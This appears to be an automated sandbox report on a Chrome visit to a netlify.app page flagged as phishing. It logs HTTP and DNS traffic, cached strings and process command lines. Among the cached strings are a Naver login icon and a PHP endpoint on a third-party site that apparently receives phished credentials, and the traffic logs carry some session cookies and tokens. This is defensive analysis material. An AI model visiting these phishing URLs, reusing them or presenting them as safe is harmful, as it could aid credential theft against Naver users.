J0dCxhdXRvcGxheSxjcm9zc29yaWdpbmlzb2xhdGVkLGhpZCxjaHVhYml0bmVzcyxzY3JlZW53YWtlbG9jayxwcml2YXRlYWdncmVnYXRpb24sY2xpcGJvYXJkd3JpdGUsYXR0cmlidXRpb25yZXBvcnRpbmcsY2hkZXZpY2VtZW1vcnksbWljcm9waG9u
Source: global traffic	HTTP traffic detected: GET /adsense/domains/caf.js?pac=0 HTTP/1.1Host: syndicatedsearch.googConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /tracker/tc_imp.gif?e=37dfbd8ee84e001269e8c131e8478a9c9225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d59168a6f2617071a10acf9f29f671dd78bdc0f7d3a1cfa792251d532df659600350c219301020932555ac3ed3f1e77be26bb25cb43e29b25f45471ad0f2e6410d25afe5aecd2948a7fe07f52a13ad2a24710d14e681f2d1586d31c64e56ac8bf88b71208fe59f1d329e921c46bcf40e25c7ea8290ee95c400035db386ee683e99332bd06b442c316f0496f70bfc72f02431e24f97999c140ab51258fc6e279126332a5de6c7fd6d5431f2b436f0715a7902c701e56f2ab0b2093aef6298ee35d60013ee9f3e4869265bcd5d759bf079d5d3a63ccea9de6f13599d9b13a93350983f0c82a1e1ea3683aba8c063abbcaf1778807fc4eae965d8013d9c56d9c7c71d69338c722d795f6bbdea6fd4075e93daaa9ae7c433ebdcf71d2e113f01a1813dd405c85d0cd88c0bcdd70ff1b90d0f58838b62f3574937b6bccc2df0e37d7ec74bb11e0830dce37ef33024a5e8c6eff03dfcba874b4822ac419e0cf929b6b8d4d4f68fe481f5e72092687a023fa05d1cfa62aae9969ebbb2a9adaa9b13dc1f0e35f477083ee5252f0b1490242bbacac74e66688e037f2e62eb211bc23c1168d40c5a22ec60426e3ad94603b3e690a23151442d998e82c927cb20030067f83c50acd840a4fbbe18ba8b67ec3f3e5fb85fea9f54a4635f259c4d5212bf40a3b7aac090b3b04910df76405d0af843ade72dd378ab52dcabb0b9f7f0e28290b624df49f9bd9760326f969229d87dbc7c1d84f17dcf0eb6f9ca41e67ca9056657bf391c54475e663d423c049b27bc24d85aa46afe36dbc8982d0845536baa229699f70a68dacb956c13d261c05887a030de4e14d85f112ca9987da1490c595390e2b55e17ef854b85fb29d7bc971107403287762e75a8e9d210afa3c82b5ff35c5dd14da2161a510603eceabc30059ed74f392028344484038e0647fd9f6893fd95d68cbd950f492&cri=S9cmgKYQSv&ts=1155&cb=1736642001047 HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
Source: global traffic	HTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/search.svg?c=%23ffffff HTTP/1.1Host: afs.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%23ffffff HTTP/1.1Host: afs.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /mon HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
Source: global traffic	HTTP traffic detected: GET /afs/gen_204?client=dp-teaminternet09_3ph&output=uds_ads_only&zx=5ufhciitm2l3&aqid=0Q2DZ5GwDdGvjuwPrJSBkA4&psid=7840396037&pbt=bs&adbx=366.5&adby=214&adbh=511&adbw=530&adbah=160%2C160%2C160&adbn=master-1&eawp=partner-dp-teaminternet09_3ph&errv=712519386&csala=6%7C0%7C987%7C1235%7C249&lle=0&ifv=1&hpt=1 HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.xay.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/search.svg?c=%23ffffff HTTP/1.1Host: afs.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%23ffffff HTTP/1.1Host: afs.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /afs/gen_204?client=dp-teaminternet09_3ph&output=uds_ads_only&zx=lwf3qohhv0j&aqid=0Q2DZ5GwDdGvjuwPrJSBkA4&psid=7840396037&pbt=bv&adbx=366.5&adby=214&adbh=511&adbw=530&adbah=160%2C160%2C160&adbn=master-1&eawp=partner-dp-teaminternet09_3ph&errv=712519386&csala=6%7C0%7C987%7C1235%7C249&lle=0&ifv=1&hpt=1 HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.xay.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /mon HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
Source: global traffic	HTTP traffic detected: GET /mon HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
Source: global traffic	HTTP traffic detected: GET /mon HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
Source: global traffic	HTTP traffic detected: GET /mon HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
Source: global traffic	HTTP traffic detected: GET /mon HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.xay.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /track.php?domain=xay.io&toggle=browserjs&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D HTTP/1.1Host: www.xay.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Referer: http://www.xay.io/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /themes/cleanPeppermintBlack_657d9013/img/arrows.png HTTP/1.1Host: d38psrni17bvxu.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://www.xay.io/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ls.php?t=67830dce&token=81c92fd1c3d837096544712dee4879b2447b28ba HTTP/1.1Host: www.xay.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Referer: http://www.xay.io/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /track.php?domain=xay.io&toggle=browserjs&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D HTTP/1.1Host: www.xay.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /themes/cleanPeppermintBlack_657d9013/img/arrows.png HTTP/1.1Host: d38psrni17bvxu.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /track.php?domain=xay.io&caf=1&toggle=answercheck&answer=yes&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D HTTP/1.1Host: www.xay.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Referer: http://www.xay.io/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _cq_duid=1.1736641999.xeCITppN5uNufKAu; _cq_suid=1.1736641999.rSHuGynQKZfzXWFh; __gsas=ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.xay.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://www.xay.io/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _cq_duid=1.1736641999.xeCITppN5uNufKAu; _cq_suid=1.1736641999.rSHuGynQKZfzXWFh; __gsas=ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A
Source: global traffic	HTTP traffic detected: GET /track.php?domain=xay.io&caf=1&toggle=answercheck&answer=yes&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D HTTP/1.1Host: www.xay.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _cq_duid=1.1736641999.xeCITppN5uNufKAu; _cq_suid=1.1736641999.rSHuGynQKZfzXWFh; __gsas=ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.xay.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _cq_duid=1.1736641999.xeCITppN5uNufKAu; _cq_suid=1.1736641999.rSHuGynQKZfzXWFh; __gsas=ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A
Source: global traffic	HTTP traffic detected: GET /privacy.html HTTP/1.1Host: www.xay.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://www.xay.io/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _cq_duid=1.1736641999.xeCITppN5uNufKAu; _cq_suid=1.1736641999.rSHuGynQKZfzXWFh; __gsas=ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: heuristic-knuth-588d37.netlify.app
Source: global traffic	DNS traffic detected: DNS query: stackpath.bootstrapcdn.com
Source: global traffic	DNS traffic detected: DNS query: i.imgur.com
Source: global traffic	DNS traffic detected: DNS query: nid.naver.com
Source: global traffic	DNS traffic detected: DNS query: essentialhandymanservices.com
Source: global traffic	DNS traffic detected: DNS query: www.xay.io
Source: global traffic	DNS traffic detected: DNS query: www.dynadot.com
Source: global traffic	DNS traffic detected: DNS query: euob.netgreencolumn.com
Source: global traffic	DNS traffic detected: DNS query: d38psrni17bvxu.cloudfront.net
Source: global traffic	DNS traffic detected: DNS query: syndicatedsearch.goog
Source: global traffic	DNS traffic detected: DNS query: obseu.netgreencolumn.com
Source: global traffic	DNS traffic detected: DNS query: afs.googleusercontent.com

Source: unknown

HTTP traffic detected: POST /mon HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveContent-Length: 2736sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: http://www.xay.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://www.xay.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda

Source: chromecache_103.2.dr	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: chromecache_103.2.dr	String found in binary or memory: https://essentialhandymanservices.com/wp/next.php
Source: chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=
Source: chromecache_108.2.dr, chromecache_95.2.dr	String found in binary or memory: https://getbootstrap.com/)
Source: chromecache_108.2.dr, chromecache_95.2.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_108.2.dr, chromecache_95.2.dr	String found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_103.2.dr	String found in binary or memory: https://i.imgur.com/g1U1hqo.png);
Source: chromecache_103.2.dr	String found in binary or memory: https://nid.naver.com/favicon_1024.png
Source: chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.dr	String found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
Source: chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.dr	String found in binary or memory: https://partner.googleadservices.com/gampad/cookie.js
Source: chromecache_103.2.dr	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
Source: chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.dr	String found in binary or memory: https://syndicatedsearch.goog
Source: chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.dr	String found in binary or memory: https://www.google.com/pagead/1p-conversion/16521530460/?gad_source=1&adview_type=5
Source: chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.dr	String found in binary or memory: https://www.googleadservices.com/pagead/aclk
Source: chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion/16521530460/?gad_source=1&adview_type=3

Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55554 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55503
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55624
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55701
Source: unknown	Network traffic detected: HTTP traffic on port 55548 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55548
Source: unknown	Network traffic detected: HTTP traffic on port 55564 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55500
Source: unknown	Network traffic detected: HTTP traffic on port 55521 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55588
Source: unknown	Network traffic detected: HTTP traffic on port 55519 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55484 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55594
Source: unknown	Network traffic detected: HTTP traffic on port 55699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55538 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55511 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55534 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55517
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55519
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55510
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55554
Source: unknown	Network traffic detected: HTTP traffic on port 55503 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55511
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55483
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55484
Source: unknown	Network traffic detected: HTTP traffic on port 55594 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55491 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 55510 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 55495 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55500 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55487
Source: unknown	Network traffic detected: HTTP traffic on port 55523 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55564
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55521
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55522
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55523
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55495
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55530
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55491
Source: unknown	Network traffic detected: HTTP traffic on port 55588 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 55517 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55530 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 55532 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55498 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55538
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55498
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55532
Source: unknown	Network traffic detected: HTTP traffic on port 55540 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55522 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55534
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55540
Source: unknown	Network traffic detected: HTTP traffic on port 55487 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55483 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: classification engine

Classification label: mal76.phis.win@18/60@59/23

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1900,i,12343564241610681806,8701581686100418049,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://heuristic-knuth-588d37.netlify.app/?naps/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1900,i,12343564241610681806,8701581686100418049,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
